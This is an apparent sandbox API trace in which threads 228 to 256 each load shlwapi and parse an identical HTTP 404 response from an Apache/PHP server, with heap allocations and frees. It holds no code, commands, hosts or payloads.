[0314.236] GetProcessHeap () returned 0x840000 [0314.236] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 228 os_tid = 0x768 [0314.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.749] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:33 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0314.749] GetProcessHeap () returned 0x840000 [0314.749] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0314.749] GetProcessHeap () returned 0x840000 [0314.749] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0314.749] GetProcessHeap () returned 0x840000 [0314.749] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 229 os_tid = 0x5a4 [0315.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.291] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:34 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0315.291] GetProcessHeap () returned 0x840000 [0315.291] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0315.291] GetProcessHeap () returned 0x840000 [0315.292] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0315.292] GetProcessHeap () returned 0x840000 [0315.292] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 230 os_tid = 0xc8c [0315.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.794] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:34 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0315.794] GetProcessHeap () returned 0x840000 [0315.794] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0315.794] GetProcessHeap () returned 0x840000 [0315.794] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0315.794] GetProcessHeap () returned 0x840000 [0315.794] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 231 os_tid = 0x638 [0316.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.327] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:35 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0316.327] GetProcessHeap () returned 0x840000 [0316.327] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0316.327] GetProcessHeap () returned 0x840000 [0316.327] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0316.327] GetProcessHeap () returned 0x840000 [0316.327] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 232 os_tid = 0x84 [0316.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.840] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:35 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0316.840] GetProcessHeap () returned 0x840000 [0316.840] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0316.840] GetProcessHeap () returned 0x840000 [0316.840] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0316.840] GetProcessHeap () returned 0x840000 [0316.840] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 233 os_tid = 0xec [0317.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0317.334] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:36 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0317.334] GetProcessHeap () returned 0x840000 [0317.334] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0317.334] GetProcessHeap () returned 0x840000 [0317.334] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0317.334] GetProcessHeap () returned 0x840000 [0317.334] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 234 os_tid = 0x884 [0317.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0317.910] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:36 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0317.910] GetProcessHeap () returned 0x840000 [0317.910] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0317.910] GetProcessHeap () returned 0x840000 [0317.910] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0317.910] GetProcessHeap () returned 0x840000 [0317.910] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 235 os_tid = 0xb14 [0318.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0318.520] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:37 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0318.520] GetProcessHeap () returned 0x840000 [0318.520] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0318.521] GetProcessHeap () returned 0x840000 [0318.521] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0318.521] GetProcessHeap () returned 0x840000 [0318.521] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 236 os_tid = 0xb60 [0319.059] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.060] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:38 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0319.060] GetProcessHeap () returned 0x840000 [0319.060] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0319.060] GetProcessHeap () returned 0x840000 [0319.060] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0319.060] GetProcessHeap () returned 0x840000 [0319.060] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 237 os_tid = 0xb10 [0319.527] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.527] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:38 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0319.527] GetProcessHeap () returned 0x840000 [0319.527] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0319.527] GetProcessHeap () returned 0x840000 [0319.527] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0319.528] GetProcessHeap () returned 0x840000 [0319.528] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 238 os_tid = 0xae8 [0320.013] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.013] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:39 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0320.013] GetProcessHeap () returned 0x840000 [0320.013] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0320.013] GetProcessHeap () returned 0x840000 [0320.014] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0320.014] GetProcessHeap () returned 0x840000 [0320.014] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 239 os_tid = 0xcf8 [0320.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.759] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:39 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0320.760] GetProcessHeap () returned 0x840000 [0320.760] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0320.760] GetProcessHeap () returned 0x840000 [0320.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0320.760] GetProcessHeap () returned 0x840000 [0320.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 240 os_tid = 0xf04 [0321.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.292] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:40 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.292] GetProcessHeap () returned 0x840000 [0321.292] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0321.292] GetProcessHeap () returned 0x840000 [0321.293] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0321.293] GetProcessHeap () returned 0x840000 [0321.293] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 241 os_tid = 0x13a8 [0321.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.719] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:40 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.719] GetProcessHeap () returned 0x840000 [0321.719] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0321.719] GetProcessHeap () returned 0x840000 [0321.719] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0321.720] GetProcessHeap () returned 0x840000 [0321.720] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 242 os_tid = 0x45c [0322.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.206] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:41 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0322.207] GetProcessHeap () returned 0x840000 [0322.207] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0322.207] GetProcessHeap () returned 0x840000 [0322.207] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0322.207] GetProcessHeap () returned 0x840000 [0322.207] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 243 os_tid = 0xa3c [0322.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.732] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:41 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0322.732] GetProcessHeap () returned 0x840000 [0322.732] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0322.733] GetProcessHeap () returned 0x840000 [0322.733] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0322.733] GetProcessHeap () returned 0x840000 [0322.733] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 244 os_tid = 0xc50 [0323.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.398] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:42 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0323.398] GetProcessHeap () returned 0x840000 [0323.398] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0323.398] GetProcessHeap () returned 0x840000 [0323.398] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0323.398] GetProcessHeap () returned 0x840000 [0323.398] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 245 os_tid = 0x13a0 [0323.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.940] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:43 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0323.940] GetProcessHeap () returned 0x840000 [0323.940] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0323.940] GetProcessHeap () returned 0x840000 [0323.940] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0323.940] GetProcessHeap () returned 0x840000 [0323.940] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 246 os_tid = 0x1088 [0324.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.397] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:43 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0324.397] GetProcessHeap () returned 0x840000 [0324.397] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0324.397] GetProcessHeap () returned 0x840000 [0324.397] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0324.397] GetProcessHeap () returned 0x840000 [0324.397] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 247 os_tid = 0xb0 [0324.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.911] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:44 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0324.911] GetProcessHeap () returned 0x840000 [0324.911] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0324.911] GetProcessHeap () returned 0x840000 [0324.911] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0324.911] GetProcessHeap () returned 0x840000 [0324.911] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 248 os_tid = 0x6a4 [0325.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.399] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:44 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0325.399] GetProcessHeap () returned 0x840000 [0325.399] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0325.399] GetProcessHeap () returned 0x840000 [0325.399] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0325.399] GetProcessHeap () returned 0x840000 [0325.399] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 249 os_tid = 0x990 [0325.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.912] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:45 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0325.912] GetProcessHeap () returned 0x840000 [0325.912] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0325.912] GetProcessHeap () returned 0x840000 [0325.912] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0325.912] GetProcessHeap () returned 0x840000 [0325.912] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 250 os_tid = 0x1150 [0326.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0326.489] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:45 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0326.495] GetProcessHeap () returned 0x840000 [0326.495] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0326.495] GetProcessHeap () returned 0x840000 [0326.495] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0326.495] GetProcessHeap () returned 0x840000 [0326.495] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 251 os_tid = 0x1360 [0326.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.159] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:46 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0327.159] GetProcessHeap () returned 0x840000 [0327.159] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0327.159] GetProcessHeap () returned 0x840000 [0327.159] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0327.159] GetProcessHeap () returned 0x840000 [0327.159] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 252 os_tid = 0x11f0 [0327.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.702] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:46 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0327.702] GetProcessHeap () returned 0x840000 [0327.702] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0327.702] GetProcessHeap () returned 0x840000 [0327.702] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0327.702] GetProcessHeap () returned 0x840000 [0327.702] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 253 os_tid = 0x1110 [0328.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.200] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:47 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0328.200] GetProcessHeap () returned 0x840000 [0328.200] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0328.200] GetProcessHeap () returned 0x840000 [0328.200] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0328.200] GetProcessHeap () returned 0x840000 [0328.200] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 254 os_tid = 0xf84 [0328.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.808] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:47 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0328.808] GetProcessHeap () returned 0x840000 [0328.808] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0328.808] GetProcessHeap () returned 0x840000 [0328.808] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0328.808] GetProcessHeap () returned 0x840000 [0328.808] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 255 os_tid = 0x120c [0329.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.271] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:48 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0329.271] GetProcessHeap () returned 0x840000 [0329.271] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0329.271] GetProcessHeap () returned 0x840000 [0329.271] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0329.271] GetProcessHeap () returned 0x840000 [0329.271] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 256 os_tid = 0x114c [0329.768] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.769] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:48 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0329.769] GetProcessHeap () returned 0x840000 [0329.769] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0329.769] GetProcessHeap () returned 0x840000 [0329.769] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0329.769] 